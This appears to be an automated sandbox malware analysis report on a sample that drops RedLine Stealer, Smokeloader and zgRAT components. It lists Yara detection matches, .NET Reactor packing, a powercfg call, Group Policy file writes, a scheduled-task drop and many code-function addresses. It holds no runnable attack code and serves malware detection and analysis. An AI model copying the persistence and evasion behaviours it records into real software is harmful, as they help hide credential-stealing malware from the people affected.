Source: Yara match	File source: 0000000D.00000002.2145319694.0000000000843000.00000040.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2877683342.0000000000843000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: KUc3lCE6xAEEreIlM0ct4583.exe PID: 7648, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RMz4w55AcOQKH9K459dvrUGA.exe PID: 7672, type: MEMORYSTR

System Summary

Malicious sample detected (through community Yara rule)

Source: 0.3.i1crvbOZAP.exe.29625ff5620.61.unpack, type: UNPACKEDPE	Matched rule: Detects executables packed with unregistered version of .NET Reactor Author: ditekSHen
Source: 9.0.g1nHVnlr2tXTEWQsRz_M547D.exe.f50000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables packed with unregistered version of .NET Reactor Author: ditekSHen
Source: 9.0.g1nHVnlr2tXTEWQsRz_M547D.exe.f50000.0.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 0.3.i1crvbOZAP.exe.29626082c80.62.unpack, type: UNPACKEDPE	Matched rule: Detects executables packed with unregistered version of .NET Reactor Author: ditekSHen
Source: 0.3.i1crvbOZAP.exe.29625ce8c40.11.unpack, type: UNPACKEDPE	Matched rule: Detects executables packed with unregistered version of .NET Reactor Author: ditekSHen
Source: 0.3.i1crvbOZAP.exe.29625c9c780.26.unpack, type: UNPACKEDPE	Matched rule: Detects executables packed with unregistered version of .NET Reactor Author: ditekSHen
Source: 0.3.i1crvbOZAP.exe.29625c1dde0.22.unpack, type: UNPACKEDPE	Matched rule: Detects executables packed with unregistered version of .NET Reactor Author: ditekSHen
Source: 0.3.i1crvbOZAP.exe.29625f327c0.39.unpack, type: UNPACKEDPE	Matched rule: Detects executables packed with unregistered version of .NET Reactor Author: ditekSHen
Source: 0.3.i1crvbOZAP.exe.29625cd9c00.19.unpack, type: UNPACKEDPE	Matched rule: Detects executables packed with unregistered version of .NET Reactor Author: ditekSHen
Source: 0.3.i1crvbOZAP.exe.29625cff480.7.unpack, type: UNPACKEDPE	Matched rule: Detects executables packed with unregistered version of .NET Reactor Author: ditekSHen
Source: 0.3.i1crvbOZAP.exe.29625f327c0.35.unpack, type: UNPACKEDPE	Matched rule: Detects executables packed with unregistered version of .NET Reactor Author: ditekSHen
Source: 0.3.i1crvbOZAP.exe.29625cd9c00.9.unpack, type: UNPACKEDPE	Matched rule: Detects executables packed with unregistered version of .NET Reactor Author: ditekSHen
Source: 0.3.i1crvbOZAP.exe.29625c2f140.3.unpack, type: UNPACKEDPE	Matched rule: Detects executables packed with unregistered version of .NET Reactor Author: ditekSHen
Source: 0.3.i1crvbOZAP.exe.29625c1dde0.87.unpack, type: UNPACKEDPE	Matched rule: Detects executables packed with unregistered version of .NET Reactor Author: ditekSHen
Source: 0.3.i1crvbOZAP.exe.29625bfd2a0.14.unpack, type: UNPACKEDPE	Matched rule: Detects executables packed with unregistered version of .NET Reactor Author: ditekSHen
Source: 0.3.i1crvbOZAP.exe.29625cfe8b0.104.unpack, type: UNPACKEDPE	Matched rule: Detects executables packed with unregistered version of .NET Reactor Author: ditekSHen
Source: 0.3.i1crvbOZAP.exe.29625d0d1e0.102.unpack, type: UNPACKEDPE	Matched rule: Detects executables packed with unregistered version of .NET Reactor Author: ditekSHen
Source: 0.3.i1crvbOZAP.exe.29625be8caf.79.unpack, type: UNPACKEDPE	Matched rule: Detects executables packed with unregistered version of .NET Reactor Author: ditekSHen
Source: 0.3.i1crvbOZAP.exe.29625c69d20.8.unpack, type: UNPACKEDPE	Matched rule: Detects executables packed with unregistered version of .NET Reactor Author: ditekSHen
Source: 0.3.i1crvbOZAP.exe.29626065420.75.unpack, type: UNPACKEDPE	Matched rule: Detects executables packed with unregistered version of .NET Reactor Author: ditekSHen
Source: 0.3.i1crvbOZAP.exe.29625bfd2a0.21.unpack, type: UNPACKEDPE	Matched rule: Detects executables packed with unregistered version of .NET Reactor Author: ditekSHen
Source: 0.3.i1crvbOZAP.exe.29625cd9c00.25.unpack, type: UNPACKEDPE	Matched rule: Detects executables packed with unregistered version of .NET Reactor Author: ditekSHen
Source: 44.0.fSJI2dwukNtWVEjIwlXBl7N4.exe.520000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables packed with unregistered version of .NET Reactor Author: ditekSHen
Source: 0.3.i1crvbOZAP.exe.29625ff5620.55.unpack, type: UNPACKEDPE	Matched rule: Detects executables packed with unregistered version of .NET Reactor Author: ditekSHen
Source: 0.3.i1crvbOZAP.exe.29625d0d1e0.86.unpack, type: UNPACKEDPE	Matched rule: Detects executables packed with unregistered version of .NET Reactor Author: ditekSHen
Source: 0.3.i1crvbOZAP.exe.29625bcda60.92.unpack, type: UNPACKEDPE	Matched rule: Detects executables packed with unregistered version of .NET Reactor Author: ditekSHen
Source: 0.3.i1crvbOZAP.exe.29625c0bda0.6.unpack, type: UNPACKEDPE	Matched rule: Detects executables packed with unregistered version of .NET Reactor Author: ditekSHen
Source: 0.3.i1crvbOZAP.exe.29625be8caf.109.unpack, type: UNPACKEDPE	Matched rule: Detects executables packed with unregistered version of .NET Reactor Author: ditekSHen
Source: 0.3.i1crvbOZAP.exe.29626010da0.74.unpack, type: UNPACKEDPE	Matched rule: Detects executables packed with unregistered version of .NET Reactor Author: ditekSHen
Source: 0.3.i1crvbOZAP.exe.29625bcda60.82.unpack, type: UNPACKEDPE	Matched rule: Detects executables packed with unregistered version of .NET Reactor Author: ditekSHen
Source: 0.3.i1crvbOZAP.exe.29625c50820.24.unpack, type: UNPACKEDPE	Matched rule: Detects executables packed with unregistered version of .NET Reactor Author: ditekSHen
Source: 0.3.i1crvbOZAP.exe.29625be8caf.115.unpack, type: UNPACKEDPE	Matched rule: Detects executables packed with unregistered version of .NET Reactor Author: ditekSHen
Source: 0.3.i1crvbOZAP.exe.29625c9c780.28.unpack, type: UNPACKEDPE	Matched rule: Detects executables packed with unregistered version of .NET Reactor Author: ditekSHen
Source: 0.3.i1crvbOZAP.exe.29625c208e0.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables packed with unregistered version of .NET Reactor Author: ditekSHen
Source: 0.3.i1crvbOZAP.exe.29625c168a0.4.unpack, type: UNPACKEDPE	Matched rule: Detects executables packed with unregistered version of .NET Reactor Author: ditekSHen
Source: 0.3.i1crvbOZAP.exe.29625bfd2a0.5.unpack, type: UNPACKEDPE	Matched rule: Detects executables packed with unregistered version of .NET Reactor Author: ditekSHen
Source: 0000000C.00000002.2507946071.0000000000CCD000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000012.00000002.2162059804.0000000000B60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000012.00000002.2163166547.0000000000B9D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000012.00000002.2162296306.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 0000000D.00000002.2170856076.0000000002F70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000012.00000002.2169331111.0000000002A31000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 0000000C.00000002.2508285953.0000000002650000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 0000000D.00000002.2166062465.0000000002B77000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000001D.00000002.2876108133.00000000011D1000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: C:\Users\user\Documents\SimpleAdobe\g1nHVnlr2tXTEWQsRz_M547D.exe, type: DROPPED	Matched rule: Detects executables packed with unregistered version of .NET Reactor Author: ditekSHen
Source: C:\Users\user\Documents\SimpleAdobe\g1nHVnlr2tXTEWQsRz_M547D.exe, type: DROPPED	Matched rule: Detects zgRAT Author: ditekSHen
Source: C:\Users\user\Documents\SimpleAdobe\fSJI2dwukNtWVEjIwlXBl7N4.exe, type: DROPPED	Matched rule: Detects executables packed with unregistered version of .NET Reactor Author: ditekSHen

.NET source code contains very large array initializations

Source: cTThtD77H613MBNsXAevJo07.exe.0.dr, RemoteObjects.cs	Large array initialization: RemoteObjects: array initializer size 308224
Source: tskTMObYcvz1CtypLgyOWpYi.exe.0.dr, RemoteObjects.cs	Large array initialization: RemoteObjects: array initializer size 193536

PE file contains section with special chars

Source: i1crvbOZAP.exe	Static PE information: section name:
Source: i1crvbOZAP.exe	Static PE information: section name:
Source: i1crvbOZAP.exe	Static PE information: section name:
Source: i1crvbOZAP.exe	Static PE information: section name:
Source: i1crvbOZAP.exe	Static PE information: section name:
Source: i1crvbOZAP.exe	Static PE information: section name:
Source: amadka[1].exe.0.dr	Static PE information: section name:
Source: amadka[1].exe.0.dr	Static PE information: section name: .idata
Source: amadka[1].exe.0.dr	Static PE information: section name:
Source: tiToqF4gUiKaoPfx2yS40yxZ.exe.0.dr	Static PE information: section name:
Source: tiToqF4gUiKaoPfx2yS40yxZ.exe.0.dr	Static PE information: section name: .idata
Source: tiToqF4gUiKaoPfx2yS40yxZ.exe.0.dr	Static PE information: section name:

Uses powercfg.exe to modify the power settings

Source: C:\Users\user\Documents\SimpleAdobe\CQTbcHuZCBIaghzHIvMnZgpt.exe

Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0

Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_658CED10 malloc,NtFlushVirtualMemory,memset,memset,memset,memset,memset,memcpy,free,memset,memset,memcpy,memset,memset,memset,memset,memset,	12_2_658CED10
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_6590B700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	12_2_6590B700
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_6590B910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError,	12_2_6590B910
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_6590B8C0 rand_s,NtQueryVirtualMemory,	12_2_6590B8C0
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_658AF280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	12_2_658AF280
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_65AD62C0 PR_dtoa,PR_GetCurrentThread,strlen,NtFlushVirtualMemory,PR_GetCurrentThread,memcpy,memcpy,	12_2_65AD62C0

Source: C:\Users\user\Documents\SimpleAdobe\Y8KGRj_sUjw5KjZpIoRDoSwV.exe

Code function: 11_2_0040936C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,

11_2_0040936C

Source: C:\Users\user\Desktop\i1crvbOZAP.exe	File created: C:\Windows\System32\GroupPolicy\gpt.ini	Jump to behavior
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	File created: C:\Windows\System32\GroupPolicy\Machine	Jump to behavior
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	File created: C:\Windows\System32\GroupPolicy\User	Jump to behavior
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	File created: C:\Windows\System32\GroupPolicy\Machine\Registry.pol	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	File created: C:\Windows\Tasks\explorha.job
Source: C:\Windows\System32\svchost.exe	File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Code function: 0_3_0000029623C7CC96	0_3_0000029623C7CC96
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Code function: 0_2_00007FF649274E27	0_2_00007FF649274E27
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Code function: 0_2_00007FF64935CE81	0_2_00007FF64935CE81
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Code function: 0_2_00007FF64935CE8B	0_2_00007FF64935CE8B
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Code function: 0_2_00007FF64935CE99	0_2_00007FF64935CE99
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Code function: 0_2_00007FF64936823E	0_2_00007FF64936823E
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Code function: 0_2_00007FF64935CE53	0_2_00007FF64935CE53
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Code function: 0_2_00007FF64935CE58	0_2_00007FF64935CE58
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Code function: 0_2_00007FF64935CE67	0_2_00007FF64935CE67
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Code function: 0_2_00007FF64935CEFD	0_2_00007FF64935CEFD
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Code function: 0_2_00007FF64935CF07	0_2_00007FF64935CF07
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Code function: 0_2_00007FF64935CF16	0_2_00007FF64935CF16
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Code function: 0_2_00007FF64935D17D	0_2_00007FF64935D17D
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Code function: 0_2_00007FF64935D178	0_2_00007FF64935D178
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Code function: 0_2_00007FF64935D18C	0_2_00007FF64935D18C
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Code function: 0_2_00007FF64935D187	0_2_00007FF64935D187
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Code function: 0_2_00007FF64935CD90	0_2_00007FF64935CD90
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Code function: 0_2_00007FF64935CD9F	0_2_00007FF64935CD9F
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Code function: 0_2_00007FF6493675AB	0_2_00007FF6493675AB
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Code function: 0_2_00007FF64935CDA9	0_2_00007FF64935CDA9
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Code function: 0_2_00007FF64935D13C	0_2_00007FF64935D13C
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Code function: 0_2_00007FF64935D137	0_2_00007FF64935D137
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Code function: 0_2_00007FF64935D15A	0_2_00007FF64935D15A
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Code function: 0_2_00007FF64935D169	0_2_00007FF64935D169
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Code function: 0_2_00007FF64935CDF9	0_2_00007FF64935CDF9
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Code function: 0_2_00007FF64935CE03	0_2_00007FF64935CE03
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Code function: 0_2_00007FF64935CE30	0_2_00007FF64935CE30
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Code function: 0_2_00007FF64935CDB8	0_2_00007FF64935CDB8
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Code function: 0_2_00007FF64935F5D5	0_2_00007FF64935F5D5
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Code function: 0_2_00007FF64935CDD6	0_2_00007FF64935CDD6
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Code function: 0_2_00007FF64935CDDF	0_2_00007FF64935CDDF
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Code function: 0_2_00007FF64935CDF4	0_2_00007FF64935CDF4
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Code function: 0_2_00007FF64935D081	0_2_00007FF64935D081
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Code function: 0_2_00007FF64935D05B	0_2_00007FF64935D05B
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Code function: 0_2_00007FF64935D056	0_2_00007FF64935D056
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Code function: 0_2_00007FF64936A463	0_2_00007FF64936A463
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Code function: 0_2_00007FF649368468	0_2_00007FF649368468
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Code function: 0_2_00007FF64935D10A	0_2_00007FF64935D10A
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Code function: 0_2_00007FF64935D10F	0_2_00007FF64935D10F
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Code function: 0_2_00007FF64935D119	0_2_00007FF64935D119
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Code function: 0_2_00007FF64935E135	0_2_00007FF64935E135
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Code function: 0_2_00007FF64935D4BD	0_2_00007FF64935D4BD
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Code function: 0_2_00007FF64935D0C7	0_2_00007FF64935D0C7
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Code function: 0_2_00007FF64935D0E5	0_2_00007FF64935D0E5
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Code function: 0_2_00007FF64935CF8E	0_2_00007FF64935CF8E
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Code function: 0_2_00007FF64935CF9D	0_2_00007FF64935CF9D
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Code function: 0_2_00007FF64935EF9E	0_2_00007FF64935EF9E
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Code function: 0_2_00007FF64935CFAC	0_2_00007FF64935CFAC
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Code function: 0_2_00007FF64935CFA7	0_2_00007FF64935CFA7
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Code function: 0_2_00007FF64935CF3C	0_2_00007FF64935CF3C
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Code function: 0_2_00007FF64935CF43	0_2_00007FF64935CF43
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Code function: 0_2_00007FF64935CF73	0_2_00007FF64935CF73
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Code function: 0_2_00007FF64935CFF6	0_2_00007FF64935CFF6
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Code function: 0_2_00007FF64935D006	0_2_00007FF64935D006
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Code function: 0_2_00007FF64935D02E	0_2_00007FF64935D02E
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Code function: 0_2_00007FF64935CFBB	0_2_00007FF64935CFBB
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Code function: 0_2_00007FF64935CFB6	0_2_00007FF64935CFB6
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Code function: 0_2_00007FF64935CFC0	0_2_00007FF64935CFC0
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Code function: 0_2_00007FF64935CFCF	0_2_00007FF64935CFCF
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Code function: 0_2_00007FF64935CFD9	0_2_00007FF64935CFD9
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Code function: 0_2_00007FF64935CFDE	0_2_00007FF64935CFDE
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Code function: 0_2_00007FF64935CFE8	0_2_00007FF64935CFE8
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Code function: 0_2_00007FF64935CE76	0_2_00007FF64935CE76
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Code function: 0_2_00007FF64935CE94	0_2_00007FF64935CE94
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Code function: 0_2_00007FF64935CEB2	0_2_00007FF64935CEB2
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Code function: 0_2_00007FF64935CE49	0_2_00007FF64935CE49
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Code function: 0_2_00007FF64935CF0C	0_2_00007FF64935CF0C
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Code function: 0_2_00007FF64935F5AD	0_2_00007FF64935F5AD
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Code function: 0_2_00007FF64935CE2B	0_2_00007FF64935CE2B
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Code function: 0_2_00007FF64935CE26	0_2_00007FF64935CE26
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Code function: 0_2_00007FF64935D047	0_2_00007FF64935D047
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Code function: 0_2_00007FF649367790	0_2_00007FF649367790
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Code function: 0_2_00007FF64935CF57	0_2_00007FF64935CF57
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Code function: 0_2_00007FF64935D010	0_2_00007FF64935D010
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Code function: 0_2_00007FF64935CFD4	0_2_00007FF64935CFD4
Source: C:\Users\user\Documents\SimpleAdobe\uRWnWA7bjEhugCQgmREIdGsh.exe	Code function: 5_2_004BE449	5_2_004BE449
Source: C:\Users\user\Documents\SimpleAdobe\uRWnWA7bjEhugCQgmREIdGsh.exe	Code function: 5_2_0021646A	5_2_0021646A
Source: C:\Users\user\Documents\SimpleAdobe\uRWnWA7bjEhugCQgmREIdGsh.exe	Code function: 5_2_002184A0	5_2_002184A0
Source: C:\Users\user\Documents\SimpleAdobe\uRWnWA7bjEhugCQgmREIdGsh.exe	Code function: 5_2_001324F0	5_2_001324F0
Source: C:\Users\user\Documents\SimpleAdobe\uRWnWA7bjEhugCQgmREIdGsh.exe	Code function: 5_2_001B6550	5_2_001B6550
Source: C:\Users\user\Documents\SimpleAdobe\uRWnWA7bjEhugCQgmREIdGsh.exe	Code function: 5_2_00212CE0	5_2_00212CE0
Source: C:\Users\user\Documents\SimpleAdobe\uRWnWA7bjEhugCQgmREIdGsh.exe	Code function: 5_2_0041D496	5_2_0041D496
Source: C:\Users\user\Documents\SimpleAdobe\uRWnWA7bjEhugCQgmREIdGsh.exe	Code function: 5_2_001B9880	5_2_001B9880
Source: C:\Users\user\Documents\SimpleAdobe\uRWnWA7bjEhugCQgmREIdGsh.exe	Code function: 5_2_00231920	5_2_00231920
Source: C:\Users\user\Documents\SimpleAdobe\uRWnWA7bjEhugCQgmREIdGsh.exe	Code function: 5_2_00145A10	5_2_00145A10
Source: C:\Users\user\Documents\SimpleAdobe\uRWnWA7bjEhugCQgmREIdGsh.exe	Code function: 5_2_0021BEAF	5_2_0021BEAF
Source: C:\Users\user\Documents\SimpleAdobe\uRWnWA7bjEhugCQgmREIdGsh.exe	Code function: 5_2_003D7ED7	5_2_003D7ED7
Source: C:\Users\user\Documents\SimpleAdobe\cTThtD77H613MBNsXAevJo07.exe	Code function: 6_2_00CB0861	6_2_00CB0861
Source: C:\Users\user\Documents\SimpleAdobe\cTThtD77H613MBNsXAevJo07.exe	Code function: 6_2_00CB0870	6_2_00CB0870
Source: C:\Users\user\Documents\SimpleAdobe\cTThtD77H613MBNsXAevJo07.exe	Code function: 6_2_00CB082C	6_2_00CB082C
Source: C:\Users\user\Documents\SimpleAdobe\tskTMObYcvz1CtypLgyOWpYi.exe	Code function: 7_2_02610861	7_2_02610861
Source: C:\Users\user\Documents\SimpleAdobe\tskTMObYcvz1CtypLgyOWpYi.exe	Code function: 7_2_02610870	7_2_02610870
Source: C:\Users\user\Documents\SimpleAdobe\fq9BbqPKEgDrDHrc1Aru5zuA.exe	Code function: 8_2_028C325F	8_2_028C325F
Source: C:\Users\user\Documents\SimpleAdobe\fq9BbqPKEgDrDHrc1Aru5zuA.exe	Code function: 8_2_028C1D58	8_2_028C1D58
Source: C:\Users\user\Documents\SimpleAdobe\fq9BbqPKEgDrDHrc1Aru5zuA.exe	Code function: 8_2_028C32B4	8_2_028C32B4
Source: C:\Users\user\Documents\SimpleAdobe\fq9BbqPKEgDrDHrc1Aru5zuA.exe	Code function: 8_2_028C1A30	8_2_028C1A30
Source: C:\Users\user\Documents\SimpleAdobe\fq9BbqPKEgDrDHrc1Aru5zuA.exe	Code function: 8_2_028C19C1	8_2_028C19C1
Source: C:\Users\user\Documents\SimpleAdobe\fq9BbqPKEgDrDHrc1Aru5zuA.exe	Code function: 8_2_028C1D48	8_2_028C1D48
Source: C:\Users\user\Documents\SimpleAdobe\g1nHVnlr2tXTEWQsRz_M547D.exe	Code function: 9_2_01B4A578	9_2_01B4A578
Source: C:\Users\user\Documents\SimpleAdobe\g1nHVnlr2tXTEWQsRz_M547D.exe	Code function: 9_2_01B48C78	9_2_01B48C78
Source: C:\Users\user\Documents\SimpleAdobe\g1nHVnlr2tXTEWQsRz_M547D.exe	Code function: 9_2_01B40EAF	9_2_01B40EAF
Source: C:\Users\user\Documents\SimpleAdobe\g1nHVnlr2tXTEWQsRz_M547D.exe	Code function: 9_2_01B473FA	9_2_01B473FA
Source: C:\Users\user\Documents\SimpleAdobe\g1nHVnlr2tXTEWQsRz_M547D.exe	Code function: 9_2_01B4E238	9_2_01B4E238
Source: C:\Users\user\Documents\SimpleAdobe\g1nHVnlr2tXTEWQsRz_M547D.exe	Code function: 9_2_01B42522	9_2_01B42522
Source: C:\Users\user\Documents\SimpleAdobe\g1nHVnlr2tXTEWQsRz_M547D.exe	Code function: 9_2_05E626F8	9_2_05E626F8
Source: C:\Users\user\Documents\SimpleAdobe\g1nHVnlr2tXTEWQsRz_M547D.exe	Code function: 9_2_05E60EB3	9_2_05E60EB3
Source: C:\Users\user\Documents\SimpleAdobe\g1nHVnlr2tXTEWQsRz_M547D.exe	Code function: 9_2_05E60930	9_2_05E60930
Source: C:\Users\user\Documents\SimpleAdobe\g1nHVnlr2tXTEWQsRz_M547D.exe	Code function: 9_2_05E626DC	9_2_05E626DC
Source: C:\Users\user\Documents\SimpleAdobe\Y8KGRj_sUjw5KjZpIoRDoSwV.exe	Code function: 11_2_00408330	11_2_00408330
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_658A35A0	12_2_658A35A0
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_658E0DD0	12_2_658E0DD0
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_659085F0	12_2_659085F0
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_658BFD00	12_2_658BFD00
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_658CED10	12_2_658CED10
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_658D0512	12_2_658D0512
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_658B6C80	12_2_658B6C80
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_659034A0	12_2_659034A0
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_6590C4A0	12_2_6590C4A0
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_658B64C0	12_2_658B64C0
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_658CD4D0	12_2_658CD4D0
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_658AD4E0	12_2_658AD4E0
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_658E6CF0	12_2_658E6CF0
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_6591AC00	12_2_6591AC00
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_658E5C10	12_2_658E5C10
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_658F2C10	12_2_658F2C10
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_6591542B	12_2_6591542B
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_658B5440	12_2_658B5440
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_6591545C	12_2_6591545C
